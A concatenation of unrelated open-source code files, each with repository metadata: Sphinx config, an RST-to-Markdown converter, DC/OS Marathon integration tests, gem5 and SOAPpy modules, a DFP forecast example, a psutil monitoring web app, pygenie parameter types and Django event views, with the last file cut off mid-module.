# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'remodoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'remo.tex', u'ReMo Portal Documentation',
u'Mozilla', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'remoportal', u"ReMo Portal Documentation",
[u'the authors'], 1)
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
| bsd-3-clause | -2,281,941,958,961,641,500 | 31.859091 | 125 | 0.70895 | false |
MerryMage/dynarmic | externals/fmt/support/rst2md.py | 3 | 3958 | #!/usr/bin/env python
# reStructuredText (RST) to GitHub-flavored Markdown converter
import re, sys
from docutils import core, nodes, writers
def is_github_ref(node):
return re.match('https://github.com/.*/(issues|pull)/.*', node['refuri'])
class Translator(nodes.NodeVisitor):
def __init__(self, document):
nodes.NodeVisitor.__init__(self, document)
self.output = ''
self.indent = 0
self.preserve_newlines = False
def write(self, text):
self.output += text.replace('\n', '\n' + ' ' * self.indent)
def visit_document(self, node):
pass
def depart_document(self, node):
pass
def visit_section(self, node):
pass
def depart_section(self, node):
# Skip all sections except the first one.
raise nodes.StopTraversal
def visit_title(self, node):
self.version = re.match(r'(\d+\.\d+\.\d+).*', node.children[0]).group(1)
raise nodes.SkipChildren
def visit_title_reference(self, node):
raise Exception(node)
def depart_title(self, node):
pass
def visit_Text(self, node):
if not self.preserve_newlines:
node = node.replace('\n', ' ')
self.write(node)
def depart_Text(self, node):
pass
def visit_bullet_list(self, node):
pass
def depart_bullet_list(self, node):
pass
def visit_list_item(self, node):
self.write('* ')
self.indent += 2
def depart_list_item(self, node):
self.indent -= 2
self.write('\n\n')
def visit_paragraph(self, node):
self.write('\n\n')
def depart_paragraph(self, node):
pass
def visit_reference(self, node):
if not is_github_ref(node):
self.write('[')
def depart_reference(self, node):
if not is_github_ref(node):
self.write('](' + node['refuri'] + ')')
def visit_target(self, node):
pass
def depart_target(self, node):
pass
def visit_literal(self, node):
self.write('`')
def depart_literal(self, node):
self.write('`')
def visit_literal_block(self, node):
self.write('\n\n```')
if 'c++' in node['classes']:
self.write('c++')
self.write('\n')
self.preserve_newlines = True
def depart_literal_block(self, node):
self.write('\n```\n')
self.preserve_newlines = False
def visit_inline(self, node):
pass
def depart_inline(self, node):
pass
def visit_image(self, node):
self.write('')
def depart_image(self, node):
pass
def write_row(self, row, widths):
for i, entry in enumerate(row):
text = entry[0][0] if len(entry) > 0 else ''
if i != 0:
self.write('|')
self.write('{:{}}'.format(text, widths[i]))
self.write('\n')
def visit_table(self, node):
table = node.children[0]
colspecs = table[:-2]
thead = table[-2]
tbody = table[-1]
widths = [int(cs['colwidth']) for cs in colspecs]
sep = '|'.join(['-' * w for w in widths]) + '\n'
self.write('\n\n')
self.write_row(thead[0], widths)
self.write(sep)
for row in tbody:
self.write_row(row, widths)
raise nodes.SkipChildren
def depart_table(self, node):
pass
class MDWriter(writers.Writer):
"""GitHub-flavored markdown writer"""
supported = ('md',)
"""Formats this writer supports."""
def translate(self):
translator = Translator(self.document)
self.document.walkabout(translator)
self.output = (translator.output, translator.version)
def convert(rst_path):
"""Converts RST file to Markdown."""
return core.publish_file(source_path=rst_path, writer=MDWriter())
if __name__ == '__main__':
convert(sys.argv[1])
| gpl-2.0 | 9,083,898,776,519,506,000 | 23.893082 | 80 | 0.561142 | false |
mnaboka/dcos | packages/dcos-integration-test/extra/test_applications.py | 3 | 9315 | import logging
import uuid
import pytest
from test_util.marathon import get_test_app, get_test_app_in_docker, get_test_app_in_ucr
log = logging.getLogger(__name__)
def test_if_marathon_app_can_be_deployed(dcos_api_session):
"""Marathon app deployment integration test
This test verifies that marathon app can be deployed, and that service points
returned by Marathon indeed point to the app that was deployed.
The application being deployed is a simple http server written in python.
Please test_server.py for more details.
This is done by assigning an unique UUID to each app and passing it to the
docker container as an env variable. After successful deployment, the
"GET /test_uuid" request is issued to the app. If the returned UUID matches
the one assigned to test - test succeeds.
"""
dcos_api_session.marathon.deploy_test_app_and_check(*get_test_app())
def test_if_docker_app_can_be_deployed(dcos_api_session):
"""Marathon app inside docker deployment integration test.
Verifies that a marathon app inside of a docker daemon container can be
deployed and accessed as expected.
"""
dcos_api_session.marathon.deploy_test_app_and_check(*get_test_app_in_docker(ip_per_container=False))
@pytest.mark.parametrize("healthcheck", [
"HTTP",
"MESOS_HTTP",
])
def test_if_ucr_app_can_be_deployed(dcos_api_session, healthcheck):
"""Marathon app inside ucr deployment integration test.
Verifies that a marathon docker app inside of a ucr container can be
deployed and accessed as expected.
"""
dcos_api_session.marathon.deploy_test_app_and_check(*get_test_app_in_ucr(healthcheck))
def test_if_marathon_app_can_be_deployed_with_mesos_containerizer(dcos_api_session):
"""Marathon app deployment integration test using the Mesos Containerizer
This test verifies that a Marathon app using the Mesos containerizer with
a Docker image can be deployed.
This is done by assigning an unique UUID to each app and passing it to the
docker container as an env variable. After successfull deployment, the
"GET /test_uuid" request is issued to the app. If the returned UUID matches
the one assigned to test - test succeds.
When port mapping is available (MESOS-4777), this test should be updated to
reflect that.
"""
app, test_uuid = get_test_app()
app['container'] = {
'type': 'MESOS',
'docker': {
# TODO(cmaloney): Switch to an alpine image with glibc inside.
'image': 'debian:jessie'
},
'volumes': [{
'containerPath': '/opt/mesosphere',
'hostPath': '/opt/mesosphere',
'mode': 'RO'
}]
}
dcos_api_session.marathon.deploy_test_app_and_check(app, test_uuid)
def test_if_marathon_pods_can_be_deployed_with_mesos_containerizer(dcos_api_session):
"""Marathon pods deployment integration test using the Mesos Containerizer
This test verifies that a Marathon pods can be deployed.
"""
test_uuid = uuid.uuid4().hex
# create pod with trivial apps that function as long running processes
pod_definition = {
'id': '/integration-test-pods-{}'.format(test_uuid),
'scaling': {'kind': 'fixed', 'instances': 1},
'environment': {'PING': 'PONG'},
'containers': [
{
'name': 'ct1',
'resources': {'cpus': 0.1, 'mem': 32},
'image': {'kind': 'DOCKER', 'id': 'debian:jessie'},
'exec': {'command': {'shell': 'touch foo; while true; do sleep 1; done'}},
'healthcheck': {'command': {'shell': 'test -f foo'}}
},
{
'name': 'ct2',
'resources': {'cpus': 0.1, 'mem': 32},
'exec': {'command': {'shell': 'echo $PING > foo; while true; do sleep 1; done'}},
'healthcheck': {'command': {'shell': 'test $PING = `cat foo`'}}
}
],
'networks': [{'mode': 'host'}]
}
with dcos_api_session.marathon.deploy_pod_and_cleanup(pod_definition):
# Trivial app if it deploys, there is nothing else to check
pass
def test_octarine(dcos_api_session, timeout=30):
# This app binds to port 80. This is only required by the http (not srv)
# transparent mode test. In transparent mode, we use ".mydcos.directory"
# to go to localhost, the port attached there is only used to
# determine which port to send traffic to on localhost. When it
# reaches the proxy, the port is not used, and a request is made
# to port 80.
app, uuid = get_test_app()
app['acceptedResourceRoles'] = ["slave_public"]
app['portDefinitions'][0]["port"] = 80
app['requirePorts'] = True
with dcos_api_session.marathon.deploy_and_cleanup(app) as service_points:
port_number = service_points[0].port
# It didn't actually grab port 80 when requirePorts was unset
assert port_number == app['portDefinitions'][0]["port"]
app_name = app["id"].strip("/")
port_name = app['portDefinitions'][0]["name"]
port_protocol = app['portDefinitions'][0]["protocol"]
srv = "_{}._{}._{}.marathon.mesos".format(port_name, app_name, port_protocol)
addr = "{}.marathon.mesos".format(app_name)
transparent_suffix = ".mydcos.directory"
standard_mode = "standard"
transparent_mode = "transparent"
t_addr_bind = 2508
t_srv_bind = 2509
standard_addr = "{}:{}/ping".format(addr, port_number)
standard_srv = "{}/ping".format(srv)
transparent_addr = "{}{}:{}/ping".format(addr, transparent_suffix, t_addr_bind)
transparent_srv = "{}{}:{}/ping".format(srv, transparent_suffix, t_srv_bind)
# The uuids are different between runs so that they don't have a
# chance of colliding. They shouldn't anyways, but just to be safe.
octarine_runner(dcos_api_session, standard_mode, uuid + "1", standard_addr)
octarine_runner(dcos_api_session, standard_mode, uuid + "2", standard_srv)
octarine_runner(dcos_api_session, transparent_mode, uuid + "3", transparent_addr, bind_port=t_addr_bind)
octarine_runner(dcos_api_session, transparent_mode, uuid + "4", transparent_srv, bind_port=t_srv_bind)
def octarine_runner(dcos_api_session, mode, uuid, uri, bind_port=None):
log.info("Running octarine(mode={}, uuid={}, uri={}".format(mode, uuid, uri))
octarine = "/opt/mesosphere/bin/octarine"
bind_port_str = ""
if bind_port is not None:
bind_port_str = "-bindPort {}".format(bind_port)
server_cmd = "{} -mode {} {} {}".format(octarine, mode, bind_port_str, uuid)
log.info("Server: {}".format(server_cmd))
proxy = ('http://127.0.0.1:$({} --client --port {})'.format(octarine, uuid))
curl_cmd = '''"$(curl --fail --proxy {} {})"'''.format(proxy, uri)
expected_output = '''"$(printf "{\\n \\"pong\\": true\\n}")"'''
check_cmd = """sh -c '[ {} = {} ]'""".format(curl_cmd, expected_output)
log.info("Check: {}".format(check_cmd))
app, uuid = get_test_app()
app['requirePorts'] = True
app['cmd'] = server_cmd
app['healthChecks'] = [{
"protocol": "COMMAND",
"command": {"value": check_cmd},
'gracePeriodSeconds': 5,
'intervalSeconds': 10,
'timeoutSeconds': 10,
'maxConsecutiveFailures': 30
}]
with dcos_api_session.marathon.deploy_and_cleanup(app):
pass
def test_pkgpanda_api(dcos_api_session):
def get_and_validate_package_ids(path, node):
r = dcos_api_session.get(path, node=node)
assert r.status_code == 200
package_ids = r.json()
assert isinstance(package_ids, list)
for package_id in package_ids:
r = dcos_api_session.get(path + package_id, node=node)
assert r.status_code == 200
name, version = package_id.split('--')
assert r.json() == {'id': package_id, 'name': name, 'version': version}
return package_ids
active_buildinfo = dcos_api_session.get('/pkgpanda/active.buildinfo.full.json').json()
active_buildinfo_packages = sorted(
# Setup packages don't have a buildinfo.
(package_name, info['package_version'] if info else None)
for package_name, info in active_buildinfo.items()
)
def assert_packages_match_active_buildinfo(package_ids):
packages = sorted(map(lambda id_: tuple(id_.split('--')), package_ids))
assert len(packages) == len(active_buildinfo_packages)
for package, buildinfo_package in zip(packages, active_buildinfo_packages):
if buildinfo_package[1] is None:
# No buildinfo for this package, so we can only compare names.
assert package[0] == buildinfo_package[0]
else:
assert package == buildinfo_package
for node in dcos_api_session.masters + dcos_api_session.all_slaves:
package_ids = get_and_validate_package_ids('pkgpanda/repository/', node)
active_package_ids = get_and_validate_package_ids('pkgpanda/active/', node)
assert set(active_package_ids) <= set(package_ids)
assert_packages_match_active_buildinfo(active_package_ids)
| apache-2.0 | -8,388,294,923,881,702,000 | 39.324675 | 112 | 0.630059 | false |
nilmini20s/gem5-2016-08-13 | src/mem/slicc/ast/TypeAST.py | 92 | 2238 | # Copyright (c) 1999-2008 Mark D. Hill and David A. Wood
# Copyright (c) 2009 The Hewlett-Packard Development Company
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from slicc.ast.AST import AST
from slicc.symbols import Type
class TypeAST(AST):
def __init__(self, slicc, ident):
super(TypeAST, self).__init__(slicc)
self.ident = ident
def __repr__(self):
return self.ident
def __str__(self):
return self.ident
@property
def type(self, assert_type=None):
type = self.symtab.find(self.ident, Type)
if not type:
self.error("Type '%s' not declared.", self)
if assert_type is not None and type != assert_type:
self.error("Type '%s' is should be type '%s'", self, assert_type)
return type
| bsd-3-clause | -6,428,859,622,578,002,000 | 41.226415 | 77 | 0.733691 | false |
ivoflipse/devide.johannes | extra/soappy-cvp/tests/cardServer.py | 5 | 2999 | #!/usr/bin/env python
# Copyright (c) 2001 actzero, inc. All rights reserved.
import string
import sys
sys.path.insert (1, '..')
from SOAPpy import *
ident = '$Id: cardServer.py,v 1.4 2004/02/18 21:22:13 warnes Exp $'
# create the list of all cards, and keep strings for each suit
__cs = "Clubs"
__ds = "Diamonds"
__hs = "Hearts"
__ss = "Spades"
__cards = []
for suit in [__cs, __ds, __hs, __ss]:
for num in range(9):
num += 1
__cards.append(str(num+1)+" of "+suit)
for face in ["ace","King","Queen","Jack"]:
__cards.append(face+" of "+suit)
def deal(num):
if num not in range(1,53):
return -1
else:
alreadydealt = []
ignore = 0
handdealt = []
import whrandom
while num > 0:
idx = int(str(whrandom.random())[2:4])
if idx in range(52) and idx not in alreadydealt:
handdealt.append(__cards[idx])
alreadydealt.append(idx)
num -= 1
else:
ignore += 1
continue
return handdealt
def arrangeHand(hand):
c = []
d = []
h = []
s = []
import string
for card in hand:
if string.find(card, __cs) != -1:
c.append(card)
elif string.find(card, __ds) != -1:
d.append(card)
elif string.find(card, __hs) != -1:
h.append(card)
elif string.find(card, __ss) != -1:
s.append(card)
for cards, str in ((c, __cs),(d, __ds),(h,__hs), (s,__ss)):
cards.sort()
idx = 0
if "10 of "+str in cards:
cards.remove("10 of "+str)
if "Jack of "+str in cards: idx += 1
if "Queen of "+str in cards: idx += 1
if "King of "+str in cards: idx += 1
if "ace of "+str in cards: idx +=1
cards.insert(len(cards)-idx,"10 of "+str)
if "King of "+str in cards:
cards.remove("King of "+str)
if "ace of "+str in cards: cards.insert(len(cards)-1,"King of "+str)
else: cards.append("King of "+str)
return c+d+h+s
def dealHand (NumberOfCards, StringSeparator):
hand = deal(NumberOfCards)
return string.join(hand,StringSeparator)
def dealArrangedHand (NumberOfCards, StringSeparator):
if NumberOfCards < 1 or NumberOfCards > 52:
raise ValueError, "NumberOfCards must be between 1 and 52"
unarranged = deal(NumberOfCards)
hand = arrangeHand(unarranged)
return string.join(hand, StringSeparator)
def dealCard ():
return deal(1)[0]
run = 1
def quit():
global run
run=0;
namespace = 'http://soapinterop.org/'
server = SOAPServer (("localhost", 12027))
server.registerKWFunction (dealHand, namespace)
server.registerKWFunction (dealArrangedHand, namespace)
server.registerKWFunction (dealCard, namespace)
server.registerKWFunction (quit, namespace)
try:
while run:
server.handle_request()
except KeyboardInterrupt:
pass
| bsd-3-clause | 8,754,451,022,431,537,000 | 25.776786 | 80 | 0.565188 | false |
wubr2000/googleads-python-lib | examples/dfp/v201508/forecast_service/get_availability_forecast_for_line_item.py | 4 | 2272 | #!/usr/bin/python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets an availability forecast for an existing line item.
To determine which line items exist, run get_all_line_items.py.
"""
# Import appropriate modules from the client library.
from googleads import dfp
# Set the line item to get a forecast for.
LINE_ITEM_ID = 'INSERT_LINE_ITEM_ID_HERE'
def main(client, line_item_id):
# Initialize appropriate service.
forecast_service = client.GetService('ForecastService', version='v201508')
# Set forecasting options.
forecast_options = {
'includeContendingLineItems': True,
'includeTargetingCriteriaBreakdown': True,
}
# Get forecast for line item.
forecast = forecast_service.getAvailabilityForecastById(
line_item_id, forecast_options)
matched = long(forecast['matchedUnits'])
available_percent = (((long(forecast['availableUnits'])/
(matched * 1.0)) * 100)
if matched != 0 else 0)
contending_line_items = ([] if 'contendingLineItems' not in forecast
else forecast['contendingLineItems'])
# Display results.
print '%s %s matched.' % (matched, forecast['unitType'].lower())
print '%s%% %s available.' % (available_percent, forecast['unitType'].lower())
print '%d contending line items.' % len(contending_line_items)
if 'possibleUnits' in forecast and matched:
possible_percent = (long(forecast['possibleUnits'])/(matched * 1.0)) * 100
print '%s%% %s possible' % (possible_percent, forecast['unitType'].lower())
if __name__ == '__main__':
# Initialize client object.
dfp_client = dfp.DfpClient.LoadFromStorage()
main(dfp_client, LINE_ITEM_ID)
| apache-2.0 | 3,155,967,955,401,109,500 | 35.063492 | 80 | 0.698063 | false |
mavjs/ProcAnalyst | procanalyst.py | 1 | 3109 | #!/usr/bin/env python
import os
import sys
import web
import psutil
from convert import HumanReadable
from configparse import ParseConfig
urls = (
'/', 'Index',
'/proc', 'ProcList',
'/favicon.ico', 'favicon',
)
class favicon(object):
"""
On base web.py process, the request for favicon.ico 404s, this make it
displayable and thus avoid the 404s.
"""
def GET(self):
raise web.redirect('static/favicon.ico')
class ProcList(object):
"""
Class to render the ProcList a.k.a /proc, which displays list of processes.
"""
def GET(self):
# https://groups.google.com/forum/?fromgroups=#!topic/webpy/QWOJBZMyhI4
render = web.template.render('templates/')
proclist = psutil.get_process_list()
ostype = os.name
return render.proclist(proclist, ostype)
class Index(object):
"""
Class to render the index a.k.a / path of the web server
"""
def __init__(self):
self.inet_dev, self.convert = ParseConfig().getmiscvar()
def GET(self):
render = web.template.render('templates/')
device = self.inet_dev # change this to reflect your network device
cpus = psutil.NUM_CPUS
if self.convert:
up = HumanReadable(psutil.network_io_counters(pernic=True)[device].bytes_sent).bytes2human()
down = HumanReadable(psutil.network_io_counters(pernic=True)[device].bytes_recv).bytes2human()
phymem = HumanReadable(psutil.TOTAL_PHYMEM).bytes2human()
else:
up = psutil.network_io_counters(pernic=True)[device].bytes_sent
down = psutil.network_io_counters(pernic=True)[device].bytes_recv
phymem = psutil.TOTAL_PHYMEM
disks_name = self.get_disk_usage().keys()
disks = self.get_disk_usage()
return render.index(up, down, cpus, phymem, disks, disks_name)
def get_disk_usage(self):
disk_usages = {}
for i in psutil.disk_partitions():
try:
usage = psutil.disk_usage(i.mountpoint)
if self.convert:
usage_total = HumanReadable(usage.total).bytes2human()
usage_used = HumanReadable(usage.used).bytes2human()
else:
usage_total = usage.total
usage_used = usage.used
except OSError:
pass
disk_usages[i.mountpoint] = {'total':usage_total,'used':usage_used,'fstype':i.fstype}
return disk_usages
if os.name == 'posix':
if not os.getuid() == 0:
sys.exit('\n[WARNING!] This needs to run as root/administrator! [WARNING!]\n')
else:
if __name__ == "__main__":
app = web.application(urls, globals())
app.run()
elif os.name == 'nt':
import ctypes
if not ctypes.windll.shell32.IsUserAnAdmin() == 1:
sys.exit('\n[WARNING!] This needs to run as root/administrator! [WARNING!]\n')
else:
if __name__ == "__main__":
app = web.application(urls, globals())
app.run()
| gpl-2.0 | -4,700,249,065,902,330,000 | 34.329545 | 106 | 0.588614 | false |
jbzdak/pygenie | pygenie/lib/params/_par_type.py | 1 | 6047 | from _operator import itemgetter
import collections
import enum
import re
from pygenie import init;
from pygenie.init import SAD_LIB
from pygenie.lib.errors import GenieDatetimeConversionError
init._make_initialized()
from pygenie.lib.params._data import par_map, text_lengths, absolute_time_params
class ParamType(object):
def get_field_size_in_bytes(self):
raise NotImplementedError()
def from_python(self, obj=None):
raise NotImplementedError()
def to_python(self, pointer):
raise NotImplementedError()
class UnsupportedParam(ParamType):
def __init__(self, param_type):
self.param_type = param_type
def get_field_size_in_bytes(self):
raise NotImplementedError("Unsupported (yet) param type '{}'".format(self.param_type))
def from_python(self, obj=None):
raise NotImplementedError("Unsupported (yet) param type '{}'".format(self.param_type))
def to_python(self, pointer):
raise NotImplementedError("Unsupported (yet) param type '{}'".format(self.param_type))
class UnknownLengthTextParam(ParamType):
def __init__(self, param_name):
self.param_name = param_name
def get_field_size_in_bytes(self):
raise NotImplementedError("Text parameter {} has unknown length, and can't be used".format(self.param_name))
def from_python(self, obj=None):
raise NotImplementedError("Text parameter {} has unknown length, and can't be used".format(self.param_name))
def to_python(self, pointer):
raise NotImplementedError("Text parameter {} has unknown length, and can't be used".format(self.param_name))
class FFIParamType(ParamType):
def __init__(self, ffi_type, default, object_size):
super().__init__()
self.ffi_type = ffi_type
self.default = default
self.object_size = object_size
def get_field_size_in_bytes(self):
return self.object_size
def from_python(self, obj=None):
if obj is None:
obj=self.default
ptr = init.ffi.new("{}*".format(self.ffi_type))
ptr[0] = obj
return ptr
def to_python(self, pointer):
return pointer[0]
class TimeDeltaParam(FFIParamType):
def __init__(self):
super().__init__('double', 0.0, 8)
class FFITextParameter(ParamType):
def __init__(self, text_len):
super().__init__()
self.text_len = text_len-1
self.string_len = text_len
self.default = b'-'*self.text_len
def from_python(self, obj=None):
if obj is None:
obj = self.default
if len(obj) > self.text_len:
raise ValueError("Value of parmeter is longer than field length")
obj = obj + b'\0' * (self.string_len - len(obj))
value = init.ffi.new('char[]', self.string_len)
value[0:self.string_len] = obj
return value
def get_field_size_in_bytes(self):
return self.string_len
def to_python(self, pointer):
return init.ffi.string(pointer)
def create_char_parameter_type(name):
length = text_lengths[name[2:]]
if length is None:
return UnknownLengthTextParam(name)
else:
return FFITextParameter(length)
PARAM_TYPE_MAPPER = collections.defaultdict(lambda: lambda x: ParamType())
PARAM_TYPE_MAPPER.update({
"L": lambda x: FFIParamType('LONG', 0, 4),
"X": lambda x: TimeDeltaParam(),
"F": lambda x: FFIParamType('float', 0.0, 4),
"T": create_char_parameter_type})
Parameter = collections.namedtuple('Parameter', ['name', 'id', 'type'])
def _parameter_type_for_name( param_name):
return PARAM_TYPE_MAPPER[param_name[0].upper()](param_name)
class SerialParam(object):
@classmethod
def _create_from_matches(cls, matches):
def par_from_match(match):
return Parameter(
match[0], match[1], _parameter_type_for_name(match[0])
)
return SerialParam(
par_from_match(matches[0]),
{m[2]:par_from_match(m) for m in matches}
)
def __init__(self, first_param, param_map):
self.name, self.id, self.type = first_param
self.param_map = param_map
def __getitem__(self, item):
return self.param_map[item]
def __len__(self):
return len(self.param_map)
def __iter__(self):
return iter((self.param_map[ii] for ii in sorted(self.param_map.keys())))
class ParamGenerator(object):
def __init__(self):
super().__init__()
self.__serial_params_cache = {}
def param_set(self):
return par_map.keys()
def __getattr__(self, item):
try:
param_id = par_map[item]
except KeyError:
raise AttributeError(item)
par_type = _parameter_type_for_name(item)
p = Parameter(item, param_id, par_type)
setattr(self, item, p)
return p
def __getitem__(self, item):
return self.__getattr__(item)
def get_serial_parametr(self, item_pattern):
if item_pattern in self.__serial_params_cache:
return self.__serial_params_cache[item_pattern]
search_format = re.compile(item_pattern.format(r"(?P<param_idx>\d+)"))
matches = []
for name, value in par_map.items():
m = re.match(search_format, name)
if m:
matches.append((name, value, int(m.group('param_idx'))))
matches = sorted(matches, key=itemgetter(2))
return SerialParam._create_from_matches(matches)
def get_composite_parameter(self, param_names):
return SerialParam._create_from_matches(
[(param, par_map[param], ii) for ii, param in enumerate(param_names) ]
)
PARAM_GENERATOR = ParamGenerator()
class ParamAliasBase(enum.Enum):
@property
def param(self):
return getattr(PARAM_GENERATOR, self.value)
def __getitem__(self, item):
return self.value[item]
def __len__(self):
return len(self.value)
def __iter__(self):
return iter(self.value) | lgpl-3.0 | -6,578,331,627,380,840,000 | 28.076923 | 116 | 0.621134 | false |
mansonul/events | events/views.py | 1 | 50067 | import logging
import json
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponse, QueryDict, HttpResponseRedirect
from django.core.urlresolvers import reverse, reverse_lazy
from django.views.generic import (
CreateView,
DetailView,
ListView,
UpdateView,
DeleteView)
from django.shortcuts import get_object_or_404
from project.users.models import User
from .form_importers import get_form_impoter_plugin_urls
from .forms import (
EventForm,
EmailForm,
LocationForm,
FormEntryForm,
FormElementEntryFormSet,
)
from .models import (
Event,
EmailApp,
Location,
FormEntry,
FormElementEntry,
FormHandlerEntry)
from django.http import JsonResponse
# ********* New ****************
from django.contrib.auth.decorators import login_required, permission_required
# from .decorators import permissions_required, SATISFY_ALL, SATISFY_ANY
from django.contrib import messages
from django.shortcuts import redirect, render
from django.db import models, IntegrityError
from django.core.exceptions import ObjectDoesNotExist
from django.http import Http404
from django.utils.datastructures import MultiValueDictKeyError
from .base import (
fire_form_callbacks,
run_form_handlers,
form_element_plugin_registry,
form_handler_plugin_registry,
submit_plugin_form_data,
get_theme,
)
from .constants import (
CALLBACK_BEFORE_FORM_VALIDATION,
CALLBACK_FORM_VALID_BEFORE_SUBMIT_PLUGIN_FORM_DATA,
CALLBACK_FORM_VALID,
CALLBACK_FORM_VALID_AFTER_FORM_HANDLERS,
CALLBACK_FORM_INVALID
)
from .dynamic import assemble_form_class
from .settings import GET_PARAM_INITIAL_DATA, DEBUG
from .utils import (
append_edit_and_delete_links_to_field,
get_user_form_element_plugins_grouped,
get_user_form_field_plugin_uids,
get_user_form_handler_plugins,
get_user_form_handler_plugin_uids,
)
# class EventList(LoginRequiredMixin, ListView):
class EventList(ListView):
"""Organiser can view a list of his events"""
model = Event
def get_context_data(self, **kwargs):
context = super(EventList, self).get_context_data(**kwargs)
context['events'] = Event.objects.filter(user=self.request.user)
# context['events'] = Event.objects.all()
# context['quota'] = self.request.user.event_value
return context
class EventDetail(DetailView):
"""Organiser can view a list of his events"""
model = Event
template_name = 'events/event_detail.html'
def get_context_data(self, **kwargs):
context = super(EventDetail, self).get_context_data(**kwargs)
context['locations'] = Location.objects.filter(
event__title=self.object.title) # .filter(
# event__user=self.request.user)
# context['collection'] = FormElementEntry.objects.filter(
# form_entry_id=self.object.pk)
# context['options'] = assemble_form_class(
# self.object,
# )
# context['collection_quota'] = self.request.user.collection_value
return context
class EventDelete(LoginRequiredMixin, DeleteView):
"""Organiser can delete the Event"""
model = Event
template_name = 'events/event_delete.html'
form_class = EventForm
def get_success_url(self):
return reverse('events:list')
class EventCreate(LoginRequiredMixin, CreateView):
"""Organiser can create Event in frontend"""
model = Event
form_class = EventForm
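    # Template selection doubles as the quota gate: organisers still under
    # their personal ``event_value`` quota (or with no events yet) get the
    # creation form, everyone else is shown the plain event list instead.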
def get_template_names(self):
check_object = Event.objects.filter(
user=self.request.user
).order_by('-title').exists()
check_events_number = Event.objects.filter(
user=self.request.user).count()
if check_object is False:
return ['events/event_form.html']
elif check_object is True and \
check_events_number < \
self.request.user.event_value:
return ['events/event_form.html']
else:
return ['events/event_list.html']
def get_context_data(self, **kwargs):
context = super(EventCreate, self).get_context_data(**kwargs)
context['events'] = Event.objects.filter(user=self.request.user)
return context
def form_valid(self, form):
check_events_number = Event.objects.filter(
user=self.request.user).count()
organiser = form.save(commit=False)
if check_events_number < self.request.user.event_value:
organiser.user = User.objects.get(username=self.request.user)
organiser.save()
return HttpResponseRedirect(
reverse('events:l-create', args=(organiser.pk,)))
else:
return HttpResponseRedirect(
reverse('events:list'))
class EventUpdate(LoginRequiredMixin, UpdateView):
model = Event
form_class = EventForm
template_name = 'events/event_form.html'
success_url = reverse_lazy('events:list')
class LocationCreate(LoginRequiredMixin, CreateView):
"""Organiser can create Location"""
template_name = 'events/location_form.html'
form_class = LocationForm
model = Location
def form_valid(self, form):
# Pass the Foreign Key to the form
form.instance.event = get_object_or_404(
Event, pk=self.kwargs.get('pk'))
# Verify the user quota against default quota
event_location_quota = Event.objects.filter(
pk=self.kwargs['pk']).values_list(
'location_quota', flat=True)[0]
user_locations_count = Location.objects.filter(
event__pk=self.kwargs['pk']).filter(
event__user=self.request.user).count()
location = form.save(commit=False)
# Save form only if user passes condition
if user_locations_count < event_location_quota:
location.save()
return super(LocationCreate, self).form_valid(form)
# Else redirect him to the Events list
else:
return HttpResponseRedirect(
reverse('events:list'))
# Pass the Event pk to the collection
def get_success_url(self, **kwargs):
return reverse_lazy('events:fobi.edit_form_entry',
kwargs={'form_entry_id': self.kwargs['pk']})
class LocationDelete(LoginRequiredMixin, DeleteView):
"""Organiser can delete the Location"""
model = Location
template_name = 'events/location_delete.html'
form_class = LocationForm
# After delete go the event
